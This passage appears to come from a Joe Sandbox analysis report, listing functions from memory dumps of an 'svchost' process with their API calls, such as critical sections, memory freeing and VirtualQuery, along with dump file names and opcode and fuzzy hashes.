                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Time$FileSystem_errno$ObjectSingleWait
                          • String ID:
                          • API String ID: 619567339-0
                          • Opcode ID: c903c4d7f9b72e94d93dbc11975c71b78c8edad599be5a2c54c4313e5523792b
                          • Instruction ID: 583b08ec4c6ea9d136f58fd54912cdfbde6537a34a37690e72838d8498947f60
                          • Opcode Fuzzy Hash: c903c4d7f9b72e94d93dbc11975c71b78c8edad599be5a2c54c4313e5523792b
                          • Instruction Fuzzy Hash: 4221EAB279464987DF1DEF39FD042596267A795BE4F58C231EE094BB98EA38C4418310
                          Function 64945E50 Relevance: 6.1, APIs: 4, Instructions: 68synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Handle$Close$InformationObjectSingleWait
                          • String ID:
                          • API String ID: 135186658-0
                          • Opcode ID: c30ba9446f7f4fa1be5e53161ebeb563100884b9ac3cb260c09908a3213b95ff
                          • Instruction ID: 3b7f193e5d864bfd26511a8a9e44dec223bbdd41615677f5d40ebcd1d534f3ba
                          • Opcode Fuzzy Hash: c30ba9446f7f4fa1be5e53161ebeb563100884b9ac3cb260c09908a3213b95ff
                          • Instruction Fuzzy Hash: 4221DE7238164095EB05CFB2E84835A2369EB94FBCF4482369F2D87798EF34C981C710
                          Function 00007FFDA55775B0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$calloc
                          • String ID: Curl_conn_tcp_listen_set(%qd)
                          • API String ID: 3095843317-3050117601
                          • Opcode ID: d45d943c071adaaf6bbfc5393bf34d21746673db048835246faad00d33f20b60
                          • Instruction ID: 89b64b373c55ee339a6f1c344be6b5e4400de3c05e6677d8c0cef4f055704e08
                          • Opcode Fuzzy Hash: d45d943c071adaaf6bbfc5393bf34d21746673db048835246faad00d33f20b60
                          • Instruction Fuzzy Hash: EF317C3A60DB8A81E7219F26E8103AA6760FB89FC8F484131EE8D47B5ACF3CD1448714
                          Function 64944CB0 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 64944CCD
                          • GetProcessAffinityMask.KERNEL32 ref: 64944CDC
                          • GetCurrentProcess.KERNEL32 ref: 64944D12
                          • SetProcessAffinityMask.KERNEL32 ref: 64944D1A
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Process$AffinityCurrentMask
                          • String ID:
                          • API String ID: 1231390398-0
                          • Opcode ID: cb020629db8d9df8f43dbe50ffc33e56ce6b6f70c300bc2b20a6d5ce7658db5c
                          • Instruction ID: a28e0928b939d3290fc9391eb43c8c4365bbbae0e382f54d2b97f9d83160bf69
                          • Opcode Fuzzy Hash: cb020629db8d9df8f43dbe50ffc33e56ce6b6f70c300bc2b20a6d5ce7658db5c
                          • Instruction Fuzzy Hash: BFF0F033780A1456EF264F2AF80039F6395BB88B8CF890134DE8C47360EE3EC556CA10
                          Function 64947210 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Time$System_errno$File
                          • String ID:
                          • API String ID: 2046127076-0
                          • Opcode ID: 865d12a501b8b53ec2b4ffe41e8b0cc87b075d7569cf6ad6906a412f6eef4b1d
                          • Instruction ID: 9b2965fae3bff372d08399535a378afc7e62826f71c7462fdf77964becce744f
                          • Opcode Fuzzy Hash: 865d12a501b8b53ec2b4ffe41e8b0cc87b075d7569cf6ad6906a412f6eef4b1d
                          • Instruction Fuzzy Hash: 670126B139060583DF152F35ED0432BA396BB86B99F058321E92A8ABD4EF3DC4108B10
                          Function 64947890 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • VirtualQuery failed for %d bytes at address %p, xrefs: 649479CC
                          • Address %p has no image-section, xrefs: 64947897, 649479E2
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: QueryVirtual
                          • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                          • API String ID: 1804819252-157664173
                          • Opcode ID: 58d5ffc90012783a004cf7d7dd8a0b386f8571cb24a0408e1651455e6bf02d4c
                          • Instruction ID: 8be9da6754a8680321cc1caed793d364adb42589025e39e06b87e8c5ec4e3486
                          • Opcode Fuzzy Hash: 58d5ffc90012783a004cf7d7dd8a0b386f8571cb24a0408e1651455e6bf02d4c
                          • Instruction Fuzzy Hash: 2931D177792A4899FB41EF12EC44B56776ABB46BE8F488225DE0C07360EB38C143C310
                          Function 649424D0 Relevance: 5.1, APIs: 4, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                          • EnterCriticalSection.KERNEL32 ref: 6494251B
                          • LeaveCriticalSection.KERNEL32 ref: 64942544
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3168844106-0
                          • Opcode ID: 851d171cd28a33aadb92ebce3c595771e2ce9737388f0198247a6dbe2b6ab19b
                          • Instruction ID: b99e11a6316d0448230eb75c665dd17718beceef0fb6c32023aa6a9d4bb3f6bc
                          • Opcode Fuzzy Hash: 851d171cd28a33aadb92ebce3c595771e2ce9737388f0198247a6dbe2b6ab19b
                          • Instruction Fuzzy Hash: 04317F727546408AE704CF39D55079963A5F785BECF188221CE298B398EB34C845CB50
                          Function 649423A0 Relevance: 5.1, APIs: 4, Instructions: 81COMMON
                          Download Yara Rule
                          APIs
                          • EnterCriticalSection.KERNEL32 ref: 649423EB
                          • LeaveCriticalSection.KERNEL32 ref: 64942412
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3168844106-0
                          • Opcode ID: 6c5c170412acd35b33d122e5247fcd1a708dcfef8aec11af2fc5c19ab33a7a5d
                          • Instruction ID: f967bd8da5c0fc703b858b5675a139c0871c693ac84ec2db33bbd0f9f2198421
                          • Opcode Fuzzy Hash: 6c5c170412acd35b33d122e5247fcd1a708dcfef8aec11af2fc5c19ab33a7a5d
                          • Instruction Fuzzy Hash: 69314B727946008BD704CF39D84038977A5F785FACF588221DE29CA398EB35C596CB51
                          Function 64942170 Relevance: 5.1, APIs: 4, Instructions: 52COMMON
                          Download Yara Rule
                          APIs
                          • EnterCriticalSection.KERNEL32(00000120,00000000,00000068,00000000,?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89), ref: 6494219E
                          • LeaveCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421B1
                          • EnterCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421E5
                          • LeaveCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421F6
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmpDownload File
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3168844106-0
                          • Opcode ID: f15036db10595685eebc1814736d955a65ba432477aa49132a02940adeb30443
                          • Instruction ID: 7a5ad15dbad42ca2a217f772ee4adc9c7e6a81657260e45da0a70067a48174a5
                          • Opcode Fuzzy Hash: f15036db10595685eebc1814736d955a65ba432477aa49132a02940adeb30443
                          • Instruction Fuzzy Hash: B8018F237582549EE716DB77EC00B5AA7A4B789FD8F448122EE0983B14EA38C1438B01
                          Function 00007FFDA5581490 Relevance: 5.0, APIs: 4, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: c0e2cc5d984bb2fa6972c2feed5f163034c72a56b7630030a885c6ec6e1cf5bf
                          • Instruction ID: 29fe65fa7e68077af7204a2eb76749c521a46415a01ab30061e00336b8129e4a
                          • Opcode Fuzzy Hash: c0e2cc5d984bb2fa6972c2feed5f163034c72a56b7630030a885c6ec6e1cf5bf
                          • Instruction Fuzzy Hash: 80110A7AA0AA4982EB169F65E46033873B4EF95F94F444031CA4E03BA5CE38D455C348
                          Function 00007FFDA559E650 Relevance: 5.0, APIs: 4, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: freemalloc
                          • String ID:
                          • API String ID: 3061335427-0
                          • Opcode ID: 66197ecf1186118a8c42ff881f6b3ed1c2e05c151971c28045e0d41d0e14358b
                          • Instruction ID: 73dc592d774b86efe6a3ab657335a4e33730c9fc38b0d1b317b3ccd24ad13bd5
                          • Opcode Fuzzy Hash: 66197ecf1186118a8c42ff881f6b3ed1c2e05c151971c28045e0d41d0e14358b
                          • Instruction Fuzzy Hash: 34F04F79B1AB4582EB569F26F86423822B0EF8AF84B485034DA4E47785DF3CD8A4C314
                          Function 00007FFDA55927C0 Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 1e3480862a4a9241cbd34876f8c395ca154369884af30e6ae4febbb5dbfcf72e
                          • Instruction ID: ec2dbe3c01f29091d286e13fdba201de60ee65889992ff5d6f11f37cdeccae9d
                          • Opcode Fuzzy Hash: 1e3480862a4a9241cbd34876f8c395ca154369884af30e6ae4febbb5dbfcf72e
                          • Instruction Fuzzy Hash: AE01083AA0AB4582EB169F12E4643696770FB4AF90F085031EE4E07B55CF3CD4568714
                          Function 00007FFDA5596780 Relevance: 5.0, APIs: 4, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA559B8DC,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA5596791
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA559B8DC,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA559679B
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA559B8DC,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA55967A5
                            • Part of subcall function 00007FFDA5585D80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00007FFDA55968BE,?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?), ref: 00007FFDA5585DB7
                            • Part of subcall function 00007FFDA5585D80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00007FFDA55968BE,?,00000000,00007FFDA559B76F,?,?,?,?,?,?,00000000,?), ref: 00007FFDA5585DCE
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA559B8DC,?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA55967C0
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 4a9e63719135c01590bbd7e9246862d27d46a5a06684678f83abdb0d2e2eb60a
                          • Instruction ID: 2656c2eee2e09d0bd1924caa984cb3063d69f836642739ac8523b12fabff736c
                          • Opcode Fuzzy Hash: 4a9e63719135c01590bbd7e9246862d27d46a5a06684678f83abdb0d2e2eb60a
                          • Instruction Fuzzy Hash: 95E0C96DB5790A91EB16BF25DC791782330EF9AF45B541031E90E437A2CE2CD989C368